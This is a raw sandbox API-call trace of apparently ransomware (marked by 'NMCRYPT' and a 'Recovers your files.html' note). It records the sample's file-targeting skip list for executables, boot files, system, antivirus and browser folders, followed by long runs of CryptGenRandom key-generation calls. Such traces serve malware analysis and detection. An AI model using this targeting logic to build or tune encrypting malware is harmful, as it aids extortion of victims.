[0168.081] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0168.081] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0168.081] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0168.081] PathMatchSpecW (pszFile="msadomd.dll", pszSpec="*NMCRYPT") returned 0 [0168.081] PathMatchSpecW (pszFile="msadomd.dll", pszSpec="*Recovers your files.html") returned 0 [0168.081] PathMatchSpecW (pszFile="msadomd.dll", pszSpec="*.exe") returned 0 [0168.081] PathMatchSpecW (pszFile="msadomd.dll", pszSpec="*.dll") returned 1 [0168.081] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*NMCRYPT") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*Recovers your files.html") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*.exe") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*.dll") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*.lnk") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*.bat") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*.ini") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*.msi") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*.scf") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*pagefile.sys*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*AppData*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\winrar\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\java\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\windows\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\ESET\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\AVG\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*Atheros*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*Realtek*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*bootmgr*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*boot*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*boot*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*IO.SYS*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*ntldr*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*chrome*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*opera*") returned 0 [0168.082] PathMatchSpecW (pszFile="msadomd28.tlb", pszSpec="*firefox*") returned 0 [0168.083] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", pszSpec="*") returned 1 [0168.083] strlen (_Str="NMoreira") returned 0x8 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 